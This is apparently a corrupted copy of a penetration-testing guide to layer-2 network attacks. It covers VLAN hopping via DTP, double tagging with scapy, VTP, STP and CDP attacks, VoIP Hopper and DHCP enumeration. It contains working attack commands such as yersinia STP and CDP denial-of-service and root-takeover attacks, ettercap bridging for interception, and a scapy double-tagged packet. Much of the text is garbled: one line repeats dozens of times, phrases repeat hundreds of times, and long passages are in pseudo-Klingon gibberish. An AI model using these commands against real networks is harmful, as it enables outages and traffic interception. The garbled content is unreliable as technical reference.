Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP **802.1Q

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

The discussed attack of Dynamic Trunking and creating virtual interfaces an discovering hosts inside other VLANs are automatically performed by the tool: https://github.com/nccgroup/vlan-hopping---frogger

Double Tagging

If an attacker knows the value of the MAC, IP and VLAN ID of the victim host, he could try to double tag a frame with its designated VLAN and the VLAN of the victim and send a packet. As the victim won't be able to connect back with the attacker, so the best option for the attacker is communicate via UDP to protocols that can perform some interesting actions (like SNMP).

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.

To perform this attack you could use scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Qa'vIn DaH jImej 'ejwI' 'e' vItlhutlh VLAN segmentation network bypass ghaH. 'ejwI' port trunk mode switch (trunk) ghItlh virtual interfaces target VLANs ID create 'ej IP address configure ghItlh. 'ejwI' address dynamically request (DHCP) configure statically ghItlh. Depends case.

{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}

Layer 3 Private VLAN Bypass

ghItlh environments guest wireless networks port isolation (also known as private VLAN) settings implemented clients wireless access point directly communicating prevent 'e' vItlhutlh. However, technique identified circumvent isolation measures ghaH. technique exploits lack network ACLs improper configuration enable IP packets routed router reach client network ghaH.

Attack executed packet carries IP address destination client router's MAC address ghItlh. router mistakenly forward packet target client ghaH. approach similar Double Tagging Attacks ability control host accessible victim exploit security flaw ghaH.

Key Steps Attack:

1. Crafting a Packet: packet specially crafted include target client's IP address router's MAC address ghItlh.
2. Exploiting Router Behavior: crafted packet sent router configuration redirects packet target client bypassing isolation provided private VLAN settings ghaH.

VTP Attacks

VTP (VLAN Trunking Protocol) centralizes VLAN management. utilizes revision numbers maintain VLAN database integrity; modification increments number. Switches adopt configurations higher revision numbers updating VLAN databases.

VTP Domain Roles

• VTP Server: Manages VLANs—creates, deletes, modifies. broadcasts VTP announcements domain members.
• VTP Client: Receives VTP announcements synchronize VLAN database. role restricted local VLAN configuration modifications.
• VTP Transparent: Doesn't engage VTP updates forwards VTP announcements. Unaffected VTP attacks maintains constant revision number zero.

VTP Advertisement Types

• Summary Advertisement: Broadcasted VTP server 300 seconds carrying essential domain information.
• Subset Advertisement: Sent VLAN configuration changes.
• Advertisement Request: Issued VTP client request Summary Advertisement typically response detecting higher configuration revision number.

VTP vulnerabilities exploitable exclusively trunk ports VTP announcements circulate solely through them. Post-DTP attack scenarios pivot towards VTP. Tools Yersinia facilitate VTP attacks aiming wipe out VLAN database effectively disrupting network.

Note: discussion pertains VTP version 1 (VTPv1).

%% yersinia -G # Launch Yersinia in graphical mode ```

STP Attacks

vaj yIqIm STP

vaj yIqIm STP BPDU DoS

vaj yIqIm BPDUs TCP (Topology Change Notification) qoj Conf (BPDUs 'ej vaj yIqIm 'ej vaj yIqIm) switches overloaded 'ej vaj yIqIm correctly.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

STP TCP tIn

QaStaHvIS TCP, switchmey Daq CAM table 15 tInDu'wI' vItlhutlh. vaj, vaj vItlhutlh continuously packets lo'laHbe'chugh, CAM table continuously vItlhutlh (qutlh 15 tInDu'wI'wI' vaj) 'ej vItlhutlh, switch behaves hub.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: STP Root Attack: **STP Root

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

qaStaHvIS attacker 2 switchesDaq cha'logh vItlhutlh. vaj cha'logh switchesDaq traffic vItlhutlh. (MITM attack vItlhutlh).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Attacks

CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to identify each other and share configuration details.

Passive Data Collection

CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like Wireshark, tcpdump, or Yersinia. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version.

Inducing CDP Table Flooding

A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence for initiating such an attack using Yersinia, a network tool designed for testing:

---

CDP Attacks

CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to identify each other and share configuration details.

Passive Data Collection

CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like Wireshark, tcpdump, or Yersinia. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version.

Inducing CDP Table Flooding

A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence for initiating such an attack using Yersinia, a network tool designed for testing:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

"network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" "network paralysis" **"network paralysis

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

scapy ghItlh vaj lo'wI' 'ej scapy/contrib Qap ghItlh.

VoIP Attacks 'ej VoIP Hopper Tool

VoIP phones, IoT devices 'e' increasingly integrated, 'ej functionalities 'e' unlocking doors 'ej controlling thermostats 'e' special phone numbers. However, 'e' integration 'e' security risks.

voiphopper ghItlh vaj emulate VoIP phone various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). 'e' voice network's VLAN ID 'e' protocols 'e' CDP, DHCP, LLDP-MED, 'ej 802.1Q ARP.

VoIP Hopper vaj CDP Hoch tlhIngan:

1. Sniff Hoch (-c 0): network packets analyze 'ej VLAN ID 'e'.
2. Spoof Hoch (-c 1): actual VoIP device 'e' custom packets generate.
3. **Spoof Pre-made Packet Hoch (-c 2): specific Cisco IP phone model 'e' identical packets send.

preferred Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch Hoch **H

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

QaH Attacks

QaH

The first step in a DHCP attack is to perform enumeration to gather information about the DHCP server and the network. This information will help in planning and executing the attack.

QaH

The following tools can be used for DHCP enumeration:

• nmap: This tool can be used to scan the network and identify active DHCP servers.
• dhcpdump: This tool can be used to capture and analyze DHCP traffic.
• dhcpig: This tool can be used to send DHCP requests and gather information about the DHCP server.

QaH

Once the DHCP server is identified, the next step is to gather information about the DHCP lease range, subnet mask, default gateway, DNS server, and other configuration options. This information can be obtained by analyzing the DHCP traffic or by using tools like dhcpdump or dhcpig.

QaH

It is also important to identify any rogue DHCP servers on the network. Rogue DHCP servers can be used to launch attacks like DHCP spoofing or DHCP starvation. Tools like dhcpstarv or dhcpig can be used to detect rogue DHCP servers.

QaH

By performing enumeration and gathering information about the DHCP server and the network, an attacker can gain valuable insights that can be used to plan and execute DHCP attacks.

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Two types of DoS could be performed against DHCP servers. The first one consists on simulate enough fake hosts to use all the possible IP addresses.
